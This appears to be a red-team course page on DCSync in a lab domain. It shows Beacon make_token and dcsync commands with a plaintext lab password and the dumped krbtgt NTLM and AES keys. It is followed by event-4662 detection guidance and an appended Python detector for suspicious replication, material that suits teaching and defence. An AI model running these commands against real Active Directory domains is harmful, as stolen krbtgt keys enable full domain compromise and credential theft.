DCSync

The Directory Replication Service (MS-DRSR) protocol is used to synchronise and replicate Active Directory data between domain controllers. DCSync is a technique which leverages this protocol to extract username and credential data from a DC.

This requires GetNCChanges, which is usually only available to domain admins. The technique is included here for completeness, and it will be useful later on.

Beacon has a dedicated dcsync command, which calls mimikatz lsadump::dcsync in the background.

beacon> make_token DEV\nlamb F3rrari

beacon> dcsync dev.cyberbotic.io DEV\krbtgt
[DC] 'dev.cyberbotic.io' will be the domain
[DC] 'dc-2.dev.cyberbotic.io' will be the DC server
[DC] 'DEV\krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : krbtgt

Credentials:
  Hash NTLM: 9fb924c244ad44e934c390dc17e02c3d
    ntlm- 0: 9fb924c244ad44e934c390dc17e02c3d
    lm  - 0: 207d5e08551c51892309c0cf652c353b
* Primary:Kerberos-Newer-Keys *
    Default Salt : DEV.CYBERBOTIC.IOkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e
      aes128_hmac       (4096) : 6fb62ed56c7de778ca5e4fe6da6d3aca
      des_cbc_md5       (4096) : 629189372a372fda

Here we have extracted the NTLM and AES keys for the krbtgt account using lamb (a domain admin).

OPSEC: Directory replication can be detected if Directory Service Access auditing is enabled, by searching for 4662 events where the identifying GUID is 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (for DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) or 89e95b76-444d-4c62-991a-0facbeda640c (DS-Replication-Get-Changes-In-Filtered-Set). Find these using the "Suspicious Directory Replication" saved search in Kibana.

Replication traffic usually only occurs between domain controllers but can also be seen via applications such as Azure AD Connect. Mature organisations should baseline typical DRS traffic to find suspicious outliers.
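As an added example (not part of this course page or the Kibana saved search), the detection logic from the OPSEC note combined with the baselining idea above: flag 4662 events whose Properties field carries a replication GUID unless the subject is a known domain controller machine account. The event shape, the sample records and the DC allow-list are constructed assumptions; the Get-Changes-All GUID is Microsoft's documented value and is not quoted on this page.

```python
"""Flag 4662 Directory Service Access events that look like DCSync (added example)."""
import json

# Control-access-right GUIDs found in the Properties field of a 4662 event
# when a replication right was exercised.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    # Not quoted on the page; Microsoft's documented GUID for Get-Changes-All.
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Assumed baseline: machine accounts of DCs that legitimately replicate.
DC_ACCOUNTS = {"DC-2$"}

# Constructed sample events: DC-to-DC replication (expected), a replication
# request by a user account (DCSync-like), and an unrelated 4662 with a
# placeholder object GUID.
_REPL_PROPS = "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
SAMPLE_EVENTS = [
    json.dumps({"event_id": 4662, "SubjectDomainName": "DEV",
                "SubjectUserName": "DC-2$", "Properties": _REPL_PROPS}),
    json.dumps({"event_id": 4662, "SubjectDomainName": "DEV",
                "SubjectUserName": "nlamb", "Properties": _REPL_PROPS}),
    json.dumps({"event_id": 4662, "SubjectDomainName": "DEV",
                "SubjectUserName": "nlamb",
                "Properties": "{00000000-0000-0000-0000-000000000000}"}),
]


def replication_rights(properties: str) -> list:
    """Return the names of replication rights referenced in a Properties field."""
    text = properties.lower()
    return [name for guid, name in REPLICATION_GUIDS.items() if guid in text]


def flag_dcsync(raw_events, dc_accounts=DC_ACCOUNTS) -> list:
    """Return (DOMAIN\\account, rights) for replication 4662 events not sourced
    from a known domain controller machine account."""
    hits = []
    for raw in raw_events:
        ev = json.loads(raw)
        if ev.get("event_id") != 4662:
            continue
        rights = replication_rights(ev.get("Properties", ""))
        # Skip non-replication 4662s and the known DC-to-DC baseline.
        if not rights or ev["SubjectUserName"].upper() in dc_accounts:
            continue
        hits.append((f'{ev["SubjectDomainName"]}\\{ev["SubjectUserName"]}', rights))
    return hits


if __name__ == "__main__":
    for account, rights in flag_dcsync(SAMPLE_EVENTS):
        print(f"Suspicious replication by {account}: {', '.join(rights)}")
```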